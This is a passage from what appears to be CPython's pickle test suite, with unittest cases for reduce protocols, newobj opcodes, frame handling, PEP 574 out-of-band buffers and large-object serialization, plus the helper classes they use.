y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in range(2):
with support.infinite_recursion():
self.assertRaises(RuntimeError, self.dumps, x, proto)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compacity of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) intermittent with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't bee too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
def test_evil_class_mutating_dict(self):
# https://github.com/python/cpython/issues/92930
from random import getrandbits
global Bad
class Bad:
def __eq__(self, other):
return ENABLED
def __hash__(self):
return 42
def __reduce__(self):
if getrandbits(6) == 0:
collection.clear()
return (Bad, ())
for proto in protocols:
for _ in range(20):
ENABLED = False
collection = {Bad(): Bad() for _ in range(20)}
for bad in collection:
bad.bad = bad
bad.collection = collection
ENABLED = True
try:
data = self.dumps(collection, proto)
self.loads(data)
except RuntimeError as e:
expected = "changed size during iteration"
self.assertIn(expected, str(e))
def test_evil_pickler_mutating_collection(self):
# https://github.com/python/cpython/issues/92930
if not hasattr(self, "pickler"):
raise self.skipTest(f"{type(self)} has no associated pickler type")
global Clearer
class Clearer:
pass
def check(collection):
class EvilPickler(self.pickler):
def persistent_id(self, obj):
if isinstance(obj, Clearer):
collection.clear()
return None
pickler = EvilPickler(io.BytesIO(), proto)
try:
pickler.dump(collection)
except RuntimeError as e:
expected = "changed size during iteration"
self.assertIn(expected, str(e))
for proto in protocols:
check([Clearer()])
check([Clearer(), Clearer()])
check({Clearer()})
check({Clearer(), Clearer()})
check({Clearer(): 1})
check({Clearer(): 1, Clearer(): 2})
check({1: Clearer(), 2: Clearer()})
class BigmemPickleTests:
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class MyIntWithNew(int):
def __new__(cls, value):
raise AssertionError
class MyIntWithNew2(MyIntWithNew):
__new__ = int.__new__
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests:
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os_helper.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os_helper.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
os_helper.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
